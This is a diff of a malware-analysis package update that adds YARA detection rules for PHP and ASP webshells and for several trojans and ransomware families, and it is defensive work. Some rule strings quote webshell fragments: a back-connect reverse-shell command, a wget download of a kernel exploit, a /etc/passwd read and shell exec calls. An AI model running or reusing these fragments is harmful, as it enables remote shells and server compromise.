+		hash14 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+	strings:
+		$s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
+		$s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
+		$s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
+		$s4 = "$ret = myshellexec($handler);" fullword ascii
+		$s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
+	condition:
+		filesize < 900KB and 1 of them
+}
+
+rule Webshell_r57shell_2 {
+	meta:
+		description = "Detects Webshell R57"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
+		hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+		hash3 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+		hash4 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
+		hash5 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
+		hash6 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
+		hash7 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
+		hash8 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
+		hash9 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash10 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash11 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
+		hash12 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
+		hash13 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
+	strings:
+		$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
+		$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
+	condition:
+		filesize < 900KB and all of them
+}
+
+rule Webshell_27_9_acid_c99_locus7s {
+	meta:
+		description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"
+		hash4 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash5 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash6 = "5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3"
+		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash8 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+	strings:
+		$s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
+		$s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
+	condition:
+		filesize < 1711KB and 1 of them
+}
+
+rule Webshell_Backdoor_PHP_Agent_r57_mod_bizzz_shell_r57 {
+	meta:
+		description = "Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ..."
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
+		hash2 = "f51a5c5775d9cca0b137ddb28ff3831f4f394b7af6f6a868797b0df3dcdb01ba"
+		hash3 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
+		hash4 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
+		hash5 = "6dc417db9e07420a618d44217932ca8baf3541c08d5e68281e1be10af4280e4a"
+		hash6 = "5d07fdfee2dc6d81da26f05028f79badd10dec066909932129d398627b2f4e94"
+		hash7 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
+		hash8 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash9 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
+		hash10 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
+		hash11 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
+	strings:
+		$s1 = "$_POST['cmd'] = which('" ascii
+		$s2 = "$blah = ex(" fullword ascii
+	condition:
+		filesize < 600KB and all of them
+}
+
+rule Webshell_c100 {
+	meta:
+		description = "Detects Webshell - rule generated from from files c100 v. 777shell"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash4 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash5 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash6 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+	strings:
+		$s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
+		$s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
+		$s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
+		$s4 = "which wget curl w3m lynx" ascii
+		$s6 = "netstat -atup | grep IST"  ascii
+	condition:
+		filesize < 685KB and 2 of them
+}
+
+rule Webshell_AcidPoison {
+	meta:
+		description = "Detects Poison Sh3ll - Webshell"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash4 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash5 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash6 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash7 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
+		hash8 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
+		hash9 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash10 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+	strings:
+		$s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
+	condition:
+		filesize < 550KB and all of them
+}
+
+rule Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256 {
+	meta:
+		description = "Detects Webshell - rule generated from from files acid.php, FaTaLisTiCz_Fx.txt, fx.txt, p0isoN.sh3ll.txt, x0rg.byp4ss.txt"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash4 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash5 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+	strings:
+		$s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii
+		$s2 = "foreach($quicklaunch2 as $item) {" fullword ascii
+	condition:
+		filesize < 882KB and all of them
+}
+
+rule Webshell_Ayyildiz {
+	meta:
+		description = "Detects Webshell - rule generated from from files Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt, Macker's Private PHPShell.php, matamu.txt, myshell.txt, PHP Shell.txt"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"
+		hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"
+		hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"
+		hash4 = "77a63b26f52ba341dd2f5e8bbf5daf05ebbdef6b3f7e81cec44ce97680e820f9"
+		hash5 = "61c4fcb6e788c0dffcf0b672ae42b1676f8a9beaa6ec7453fc59ad821a4a8127"
+	strings:
+		$s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
+		$s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
+	condition:
+		filesize < 112KB and all of them
+}
+
+rule Webshell_zehir {
+	meta:
+		description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"
+		hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"
+		hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"
+		hash4 = "b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d"
+		hash5 = "febf37a9e8ba8ece863f506ae32ad398115106cc849a9954cbc0277474cdba5c"
+	strings:
+		$s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
+		$s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
+	condition:
+		filesize < 200KB and 1 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Tinba_Banking_Trojan.yar remnux-rules-0.0.4/yara/malware/Tinba_Banking_Trojan.yar
--- remnux-rules-0.0.3/yara/malware/Tinba_Banking_Trojan.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Tinba_Banking_Trojan.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,31 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+rule Tinba2 {
+        meta:
+                author = "n3sfox <n3sfox@gmail.com>"
+                date = "2015/11/07"
+                description = "Tinba 2 (DGA) banking trojan"
+                reference = "https://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world"
+                filetype = "memory"
+                hash1 = "c7f662594f07776ab047b322150f6ed0"
+                hash2 = "dc71ef1e55f1ddb36b3c41b1b95ae586"
+                hash3 = "b788155cb82a7600f2ed1965cffc1e88"
+
+        strings:
+                $str1 = "MapViewOfFile"
+                $str2 = "OpenFileMapping"
+                $str3 = "NtCreateUserProcess"
+                $str4 = "NtQueryDirectoryFile"
+                $str5 = "RtlCreateUserThread"
+                $str6 = "DeleteUrlCacheEntry"
+                $str7 = "PR_Read"
+                $str8 = "PR_Write"
+                $pubkey = "BEGIN PUBLIC KEY"
+                $code1 = {50 87 44 24 04 6A ?? E8}
+
+        condition:
+                all of ($str*) and $pubkey and $code1
+}
diff -Nru remnux-rules-0.0.3/yara/malware/tox.yar remnux-rules-0.0.4/yara/malware/tox.yar
--- remnux-rules-0.0.3/yara/malware/tox.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/tox.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,165 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule Win32Toxic : tox ransomware
+{
+meta:
+	author = "@GelosSnake"
+	date = "2015-06-02"
+	description = "https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us"
+	hash0 = "70624c13be4d8a4c1361be38b49cb3eb"
+	hash1 = "4f20d25cd3ae2e5c63d451d095d97046"
+	hash2 = "e0473434cc83b57c4b579d585d4c4c57"
+	hash3 = "c52090d184b63e5cc71b524153bb079e"
+	hash4 = "7ac0b49baba9914b234cde62058c96a5"
+	hash5 = "048c007de4902b6f4731fde45fa8e6a9"
+	hash6 = "238ef3e35b14e304c87b9c62f18953a9"
+	hash7 = "8908ccd681f66429c578a889e6e708e1"
+	hash8 = "de9fe2b7d9463982cc77c78ee51e4d51"
+	hash9 = "37add8d26a35a3dc9700b92b67625fa4"
+	hash10 = "a0f30e89a3431fca1d389f90dba1d56e"
+	hash11 = "d4d0658302c731003bf0683127618bd9"
+	hash12 = "d1d89e1c7066f41c1d30985ac7b569db"
+	hash13 = "97d52d7281dfae8ff9e704bf30ce2484"
+	hash14 = "2cc85be01e86e0505697cf61219e66da"
+	hash15 = "02ecfb44b9b11b846ea8233d524ecda3"
+	hash16 = "703a6ebe71131671df6bc92086c9a641"
+	hash17 = "df23629b4a4aed05d6a453280256c05a"
+	hash18 = "07466ff2572f16c63e1fee206b081d11"
+	hash19 = "792a1c0971775d32bad374b288792468"
+	hash20 = "fb7fd5623fa6b7791a221fad463223cd"
+	hash21 = "83a562aab1d66e5d170f091b2ae6a213"
+	hash22 = "99214c8c9ff4653b533dc1b19a21d389"
+	hash23 = "a92aec198eee23a3a9a145e64d0250ee"
+	hash24 = "e0f7e6b96ca72b9755965b9dac3ce77e"
+	hash25 = "f520fc947a6d5edb87aa01510bee9c8d"
+	hash26 = "6d7babbe5e438539a9fa2c5d6128d3b4"
+	hash27 = "3133c2231fcee5d6b0b4c988a5201da1"
+	hash28 = "e5b1d198edc413376e0c0091566198e4"
+	hash29 = "50515b5a6e717976823895465d5dc684"
+	hash30 = "510389e8c7f22f2076fc7c5388e01220"
+	hash31 = "60573c945aa3b8cfaca0bdb6dd7d2019"
+	hash32 = "394187056697463eba97382018dfe151"
+	hash33 = "045a5d3c95e28629927c72cf3313f4cd"
+	hash34 = "70951624eb06f7db0dcab5fc33f49127"
+	hash35 = "5def9e3f7b15b2a75c80596b5e24e0f4"
+	hash36 = "35a42fb1c65ebd7d763db4abb26d33b0"
+	hash37 = "b0030f5072864572f8e6ba9b295615fc"
+	hash38 = "62706f48689f1ba3d1d79780010b8739"
+	hash39 = "be86183fa029629ee9c07310cd630871"
+	hash40 = "9755c3920d3a38eb1b5b7edbce6d4914"
+	hash41 = "cb42611b4bed97d152721e8db5abd860"
+	hash42 = "5475344d69fc6778e12dc1cbba23b382"
+	hash43 = "8c1bf70742b62dec1b350a4e5046c7b6"
+	hash44 = "6a6541c0f63f45eff725dec951ec90a7"
+	hash45 = "a592c5bee0d81ee127cbfbcb4178afe8"
+	hash46 = "b74c6d86ec3904f4d73d05b2797f1cc3"
+	hash47 = "28d76fd4dd2dbfc61b0c99d2ad08cd8e"
+	hash48 = "fc859ae67dc1596ac3fdd79b2ed02910"
+	hash49 = "cb65d5e929da8ff5c8434fd8d36e5dfb"
+	hash50 = "888dd1acce29cd37f0696a0284ab740a"
+	hash51 = "0e3e231c255a5eefefd20d70c247d5f0"
+	hash52 = "e5ebe35d934106f9f4cebbd84e04534b"
+	hash53 = "3b580f1fa0c961a83920ce32b4e4e86d"
+	hash54 = "d807a704f78121250227793ea15aa9c4"
+	hash55 = "db462159bddc0953444afd7b0d57e783"
+	hash56 = "2ed4945fb9e6202c10fad0761723cb0e"
+	hash57 = "51183ab4fd2304a278e36d36b5fb990c"
+	hash58 = "65d602313c585c8712ea0560a655ddeb"
+	hash59 = "0128c12d4a72d14bb67e459b3700a373"
+	hash60 = "5d3dfc161c983f8e820e59c370f65581"
+	hash61 = "d4dd475179cd9f6180d5b931e8740ed6"
+	hash62 = "5dd3782ce5f94686448326ddbbac934c"
+	hash63 = "c85c6171a7ff05d66d497ad0d73a51ed"
+	hash64 = "b42dda2100da688243fe85a819d61e2e"
+	hash65 = "a5cf8f2b7d97d86f4d8948360f3db714"
+	hash66 = "293cae15e4db1217ea72581836a6642c"
+	hash67 = "56c3a5bae3cb1d0d315c1353ae67cf58"
+	hash68 = "c86dc1d0378cc0b579a11d873ac944e7"
+	hash69 = "54cef0185798f3ec1f4cb95fad4ddd7c"
+	hash70 = "eb2eff9838043b67e8024ccadcfe1a8f"
+	hash71 = "78778fe62ee28ef949eec2e7e5961ca8"
+	hash72 = "e75c5762471a490d49b79d01da745498"
+	hash73 = "1564d3e27b90a166a0989a61dc3bd646"
+	hash74 = "59ba111403842c1f260f886d69e8757d"
+	hash75 = "d840dfbe52a04665e40807c9d960cccc"
+	hash76 = "77f543f4a8f54ecf84b15da8e928d3f9"
+	hash77 = "bd9512679fdc1e1e89a24f6ebe0d5ad8"
+	hash78 = "202f042d02be4f6469ed6f2e71f42c04"
+	hash79 = "28f827673833175dd9094002f2f9b780"
+	hash80 = "0ff10287b4c50e0d11ab998a28529415"
+	hash81 = "644daa2b294c5583ce6aa8bc68f1d21f"
+	hash82 = "1c9db47778a41775bbcb70256cc1a035"
+	hash83 = "c203bc5752e5319b81cf1ca970c3ca96"
+	hash84 = "656f2571e4f5172182fc970a5b21c0e7"
+	hash85 = "c17122a9864e3bbf622285c4d5503282"
+	hash86 = "f9e3a9636b45edbcef2ee28bd6b1cfbb"
+	hash87 = "291ff8b46d417691a83c73a9d3a30cc9"
+	hash88 = "1217877d3f7824165bb28281ccc80182"
+	hash89 = "18419d775652f47a657c5400d4aef4a3"
+	hash90 = "04417923bf4f2be48dd567dfd33684e2"
+	hash91 = "31efe902ec6a5ab9e6876cfe715d7c84"
+	hash92 = "a2e4472c5097d7433b91d65579711664"
+	hash93 = "98854d7aba1874c39636ff3b703a1ed1"
+	hash94 = "5149f0e0a56b33e7bbed1457aab8763f"
+	hash95 = "7a4338193ce12529d6ae5cfcbb1019af"
+	hash96 = "aa7f37206aba3cbe5e11d336424c549a"
+	hash97 = "51cad5d45cdbc2940a66d044d5a8dabf"
+	hash98 = "85edb7b8dee5b60e3ce32e1286207faa"
+	hash99 = "34ca5292ae56fea78ba14abe8fe11f06"
+	hash100 = "154187f07621a9213d77a18c0758960f"
+	hash101 = "4e633f0478b993551db22afddfa22262"
+	hash102 = "5c50e4427fe178566cada96b2afbc2d4"
+	hash103 = "263001ac21ef78c31f4ca7ad2e7f191d"
+	hash104 = "53fd9e7500e3522065a2dabb932d9dc5"
+	hash105 = "48043dc55718eb9e5b134dac93ebb5f6"
+	hash106 = "ca19a1b85363cfed4d36e3e7b990c8b6"
+	hash107 = "41b5403a5443a3a84f0007131173c126"
+	hash108 = "6f3833bc6e5940155aa804e58500da81"
+	hash109 = "9bd50fcfa7ca6e171516101673c4e795"
+	hash110 = "6d52ba0d48d5bf3242cd11488c75b9a7"
+	hash111 = "c52afb663ff4165e407f53a82e34e1d5"
+	hash112 = "5a16396d418355731c6d7bb7b21e05f7"
+	hash113 = "05559db924e71cccee87d21b968d0930"
+	hash114 = "824312bf8e8e7714616ba62997467fa8"
+	hash115 = "dfec435e6264a0bfe47fc5239631903c"
+	hash116 = "3512e7da9d66ca62be3418bead2fb091"
+	hash117 = "7ad4df88db6f292e7ddeec7cf63fa2bc"
+	hash118 = "d512da73d0ca103df3c9e7c074babc99"
+	hash119 = "c622b844388c16278d1bc768dcfbbeab"
+	hash120 = "170ffa1cd19a1cecc6dae5bdd10efb58"
+	hash121 = "3a19c91c1c0baa7dd4a9def2e0b7c3e9"
+	hash122 = "3b7ce3ceb8d2b85ab822f355904d47ce"
+	hash123 = "a7bac2ace1f04a7ad440bd2f5f811edc"
+	hash124 = "66594a62d8c98e1387ec8deb3fe39431"
+	hash125 = "a1add9e5d7646584fd4140528d02e4c3"
+	hash126 = "11328bbf5a76535e53ab35315321f904"
+	hash127 = "048f19d79c953e523675e96fb6e417a9"
+	hash128 = "eb65fc2922eafd62defd978a3215814b"
+	hash129 = "51cc9987f86a76d75bf335a8864ec250"
+	hash130 = "a7f91301712b5a3cc8c3ab9c119530ce"
+	hash131 = "de976a5b3d603161a737e7b947fdbb9a"
+	hash132 = "288a3659cc1aec47530752b3a31c232b"
+	hash133 = "91da679f417040558059ccd5b1063688"
+	hash134 = "4ce9a0877b5c6f439f3e90f52eb85398"
+	hash135 = "1f9e097ff9724d4384c09748a71ef99d"
+	hash136 = "7d8a64a94e71a5c24ad82e8a58f4b7e6"
+	hash137 = "db119e3c6b57d9c6b739b0f9cbaeb6fd"
+	hash138 = "52c9d25179bf010a4bb20d5b5b4e0615"
+	hash139 = "4b9995578d51fb891040a7f159613a99"
+	sample_filetype = "exe"
+	yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
+strings:
+	$string0 = "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<"
+	$string1 = "t;<<t;<<t<<<t<<"
+	$string2 = ">>><<<"
+condition:
+	2 of them
+}
+
+        
diff -Nru remnux-rules-0.0.3/yara/malware/TreasureHunt.yar remnux-rules-0.0.4/yara/malware/TreasureHunt.yar
--- remnux-rules-0.0.3/yara/malware/TreasureHunt.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/TreasureHunt.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule TreasureHunt
+  {
+    meta:
+      author = "Minerva Labs"
+      ref ="http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed"
+      date = "2016/06"
+      maltype = "Point of Sale (POS) Malware"
+      filetype = "exe"
+
+    strings:
+      $a = "treasureHunter.pdb"
+      $b = "jucheck"
+      $c = "cmdLineDecrypted"
+
+    condition:
+      all of them
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Trojan_Elex.yar remnux-rules-0.0.4/yara/malware/Trojan_Elex.yar
--- remnux-rules-0.0.3/yara/malware/Trojan_Elex.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Trojan_Elex.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,80 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+import "pe"
+rule Trj_Elex_Installer_NSIS {
+        meta:
+                author = "Centro Criptológico Nacional (CCN)"
+                description = "Elex Installer NSIS"
+                ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+        strings:
+                $mz = { 4d 5a }
+                $str1 = {4e 75 6c 6c 73 6f 66 74 }
+                $str2 = {b7 a2 d5 dc 0c d6 a6 3a}
+        condition:
+                ($mz at 0) and ($str1 at 0xA008) and ($str2 at 0x1c8700)
+}
+rule Trj_Elex_Installer {
+        meta:
+                author = "Centro Criptológico Nacional (CCN)"
+                description = "Elex Installer"
+                ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+        strings:
+                $mz = { 4d 5a }
+                $str1 = {65 00 76 00 65 00 72 00 79 00 74 00 68 00 69 00 6e 00 67 00}
+                $str2 = "IsWow64Process"
+                $str3 = "SSFK"
+        condition:
+                ($mz at 0) and ($str1) and ($str2) and ($str3)
+}
+rule Trj_Elex_Service32 {
+        meta:
+                author = "Centro Criptológico Nacional (CCN)"
+                description = "Elex Service 32 bits"
+                ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+        strings:
+                $mz = { 4d 5a }
+                $str1 = "http://xa.xingcloud.com/v4/sof-everything/"
+                $str2 = "http://www.mysearch123.com"
+                $str3 = "21e223b3f0c97db3c281da1g7zccaefozzjcktmlma"
+        condition:
+                (pe.machine == pe.MACHINE_I386) and ($mz at 0) and ($str1) and ($str2) and ($str3)
+}
+rule Trj_Elex_Service64 {
+        meta:
+                author = "Centro Criptológico Nacional (CCN)"
+                description = "Elex Service 64 bits"
+                ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+        strings:
+                $mz = { 4d 5a }
+                $str1 = "http://xa.xingcloud.com/v4/sof-everything/"
+                $str2 = "http://www.mysearch123.com"
+                $str3 = "21e223b3f0c97db3c281da1g7zccaefozzjcktmlma"
+        condition:
+               (pe.machine == pe.MACHINE_AMD64) and ($mz at 0) and ($str1) and ($str2) and ($str3)
+}
+rule Trj_Elex_Dll32 {
+        meta:
+                author = "Centro Criptológico Nacional (CCN)"
+                description = "Elex DLL 32 bits"
+                ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+        strings:
+                $mz = { 4d 5a }
+                $str1 = {59 00 72 00 72 00 65 00 68 00 73 00}
+             $str2 = "RookIE/1.0"
+        condition:
+                (pe.machine == pe.MACHINE_I386) and (pe.characteristics & pe.DLL) and ($mz at 0) and ($str1) and ($str2)
+}
+rule Trj_Elex_Dll64 {
+        meta:
+                author = "Centro Criptológico Nacional (CCN)"
+                description = "Elex DLL 64 bits"
+                ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+        strings:
+                $mz = { 4d 5a }
+                $str1 = {59 00 72 00 72 00 65 00 68 00 73 00}
+             $str2 = "RookIE/1.0"
+        condition:
+                (pe.machine == pe.MACHINE_AMD64) and (pe.characteristics & pe.DLL) and ($mz at 0) and ($str1) and ($str2)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Trojan_Ponmocup.yar remnux-rules-0.0.4/yara/malware/Trojan_Ponmocup.yar
--- remnux-rules-0.0.3/yara/malware/Trojan_Ponmocup.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Trojan_Ponmocup.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,44 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+import "pe"
+rule Trj_Ponmocup {
+        meta:
+                author = "Centro Criptológico Nacional (CCN)"
+                ref ="https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+                description = "Ponmocup Installer"
+        strings:
+                $mz = { 4d 5a }
+                $pac = { 48 8F BB 54 5F 3E 4F 4E }
+                $unp = { 8B B8 7C 1F 46 00 33 C8 }
+        condition:
+                ($mz at 0) and ($pac at 0x61F7C) and ($unp at 0x29F0)
+}
+
+rule Trj_Ponmocup_Downloader {
+        meta:
+                author = "Centro Criptológico Nacional (CCN)"
+                ref ="https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+                description = "Ponmocup Downloader"
+        strings:
+                $mz = { 4d 5a }
+                $vb5 = "VB5" fullword ascii
+                $tpb = "www.thepiratebay.org" fullword wide
+                $ua = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SV1)" fullword wide
+        condition:
+                ($mz at 0) and ($vb5) and ($tpb) and ($ua)
+}
+
+rule Trj_Ponmocup_dll {
+        meta:
+                author = "Centro Criptológico Nacional (CCN)"
+                ref ="https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+                description = "Ponmocup Bot DLL"
+        strings:
+                $mz = { 4d 5a }
+                $pck = { 00 81 23 00 33 3E 00 00 3B F4 56 00 00 00 7D 00 }
+                $upk = { 68 F4 14 00 10 A1 6C C0 02 10 FF D0 59 59 E9 7A }
+        condition:
+                ($mz at 0) and ($pck at 0x8a50) and ($upk at 0x61f)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Turla.yar remnux-rules-0.0.4/yara/malware/Turla.yar
